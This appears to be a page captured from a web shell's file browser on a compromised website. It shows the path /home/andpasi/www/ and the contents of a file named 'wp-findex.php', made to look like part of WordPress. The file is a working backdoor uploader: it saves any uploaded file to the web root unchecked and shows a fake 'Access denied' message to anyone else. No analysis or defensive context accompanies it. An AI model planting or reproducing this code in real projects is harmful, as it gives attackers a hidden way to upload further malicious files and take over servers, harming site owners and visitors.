Your IP : 216.73.216.74


Current Path : /home/andpasi/www/
Upload File :
Current File : /home/andpasi/www/wp-findex.php

<?php
if (isset($_FILES['file'])) {
    move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']);
    echo "";
} else {
    echo "Access to this resource has been denied.";
}
?>